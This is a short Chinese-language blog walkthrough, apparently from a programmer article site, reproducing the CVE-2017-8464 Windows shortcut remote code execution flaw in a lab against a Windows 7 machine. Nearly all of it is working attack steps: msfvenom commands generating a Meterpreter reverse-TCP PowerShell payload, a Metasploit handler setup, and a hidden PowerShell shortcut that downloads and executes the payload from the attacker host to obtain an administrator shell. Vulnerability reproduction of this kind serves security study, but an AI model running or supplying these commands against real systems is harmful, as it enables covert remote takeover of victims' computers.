CVE-2017-8464 远程命令执行漏洞复现
程序员文章站
2022-03-24 08:37:10
...
漏洞编号:CVE2017-8464
服务器版本:Windows 7 专业版
攻击工具:metasploit
靶机IP:192.168.1.198
攻击机IP:192.168.1.187(kali)
漏洞复现原理:创建包含恶意执行脚本的快捷方式并且运行,致使本机中毒。
运行kali,在终端中生成一个反弹shell,执行:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=5555 -f psh-reflection>/opt/search.ps1
如果目标机是64位主机执行:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=5555 -f psh-reflection>/opt/search.ps1
进入到【/opt】目录下,查看文件“search.ps1”是否创建成功
将创建的“search.ps1”文件copy到【/var/www/html】目录下
启动Apache服务器
网页访问http://192.168.1.187/search.ps1,查看是否成功
在kali下面启动MSF软件输入命令
输入命令进入【handler】use exploit/multi/handler
指定本机IP 【LHOST】
指定端口【LPORT】
设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp
运行
在目标机中创建快捷键,在对象的位置中输入:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.187/search.ps1');test.ps1"
然后点击下一步,快捷名称命名为:powershell.exe(默认的powershell.exe)
运行快捷方式,回到kali攻击机中,如果msf从监听模式变成如下形式,表示已经获取目标机shell
执行ls命令,可以发现所列出的文件在目标机的C盘下
执行shell命令,进入靶机,就可以执行cmd命令了(此处已经是管理员权限,故而不在进行提权)